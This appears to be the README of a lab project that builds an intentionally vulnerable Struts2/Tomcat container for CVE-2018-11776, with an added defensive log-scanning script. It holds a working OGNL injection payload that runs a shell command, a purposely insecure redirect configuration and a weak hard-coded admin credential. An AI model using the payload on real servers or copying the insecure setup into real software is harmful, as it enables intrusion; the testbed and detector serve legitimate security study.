Project author: bhdresh

Project description:
Vulnerable docker container for CVE-2018-11776
Language:
Repository address: git://github.com/bhdresh/CVE-2018-11776.git
Created: 2018-08-25T03:06:30Z
Project community: https://github.com/bhdresh/CVE-2018-11776

License:

Vulnerable docker container for CVE-2018-11776

    # docker pull bhdresh/cve-2018-11776:1.0
    # docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0

PoC

PoC - 1
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
    Result  : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
PoC - 2
    Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
    Result  : This creates a file named 'vulnerable' in the /tmp/ directory of the docker container
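As an added, defender-side example that is not part of this repository: a small Python scanner that parses Tomcat-style access-log lines and flags requests whose URL path segments carry an OGNL expression marker (`${` or `%{`) after URL-decoding, which is the shape of both PoC requests above. The log lines are constructed samples, and the regex assumes the common access-log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the project): one benign request,
# one shaped like PoC-1 (arithmetic probe) and one shaped like the start of PoC-2.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2018:03:10:01 +0000] "GET /struts2-showcase-2.3.14/showcase.jsp HTTP/1.1" 200 5123
10.0.0.9 - - [25/Aug/2018:03:10:07 +0000] "GET /struts2-showcase-2.3.14/$%7B333+333%7D/help.action HTTP/1.1" 302 0
10.0.0.9 - - [25/Aug/2018:03:10:15 +0000] "GET /struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%29%7D/help.action HTTP/1.1" 302 0
"""

# Common access-log layout: client, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# OGNL expressions are written as ${...} or %{...}
OGNL_MARKER = re.compile(r'[$%]\{')


def is_ognl_namespace_probe(path):
    """True if any path segment (query string ignored) contains an OGNL marker.

    The path is URL-decoded twice so that a double-encoded marker (%2524%257B)
    is caught as well as a single-encoded one (%24%7B) or a literal ${.
    """
    decoded = unquote(unquote(path.split('?', 1)[0]))
    return any(OGNL_MARKER.search(segment) for segment in decoded.split('/'))


def scan_access_log(text):
    """Return one record per log line whose request path looks like an OGNL probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log format
        if is_ognl_namespace_probe(m['path']):
            hits.append({'ip': m['ip'], 'time': m['ts'],
                         'path': unquote(m['path']), 'status': int(m['status'])})
    return hits


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} {hit['status']} {hit['path']}")
```

Note that a 302 on such a request is exactly what a redirectAction without a namespace returns, so status alone does not separate the probe from a normal redirect; the decoded path is the signal.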

Steps to create vulnerable docker container

Create a Dockerfile
    FROM ubuntu:latest
    RUN apt-get update -y
    RUN apt-get upgrade -y
    RUN apt-get dist-upgrade -y
    RUN apt-get install default-jdk vim net-tools wget -y
    EXPOSE 8080
Build the docker image
    # docker build -t cve-2018-11776 .
Start the docker container
    # docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
Log in to the docker container
    # docker exec -it cve-2018-11776 /bin/bash
Make the following changes inside the docker container
Set up Tomcat:
    # mkdir ~/sources
    # cd ~/sources
    # wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
    # tar xvzf apache-tomcat-7.0.90.tar.gz
    # mv apache-tomcat-7.0.90 /opt/tomcat
Update bashrc with variables:
    # vim ~/.bashrc
    export JAVA_HOME=/usr/lib/jvm/default-java
    export CATALINA_HOME=/opt/tomcat
    # . ~/.bashrc
Add an admin user to the Tomcat GUI:
    # vim /opt/tomcat/conf/tomcat-users.xml
    <user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" ></user>
Start Tomcat server
    # $CATALINA_HOME/bin/startup.sh
Upload and deploy a vulnerable Struts2 Showcase through the Tomcat UI
    http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
Restart Tomcat
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
Add a vulnerable redirection action without a namespace:
    # vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
    <action name="help">
        <result type="redirectAction">
            <param name="actionName">date.action</param>
        </result>
    </action>
    NOTE: By default, alwaysSelectFullNamespace should be set to True.
Restart Tomcat and check out the Struts2 Showcase page:
    # $CATALINA_HOME/bin/shutdown.sh
    # $CATALINA_HOME/bin/startup.sh
    http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp

Author

@bhdresh

References

https://github.com/xfox64x/CVE-2018-11776

https://github.com/jas502n/St2-057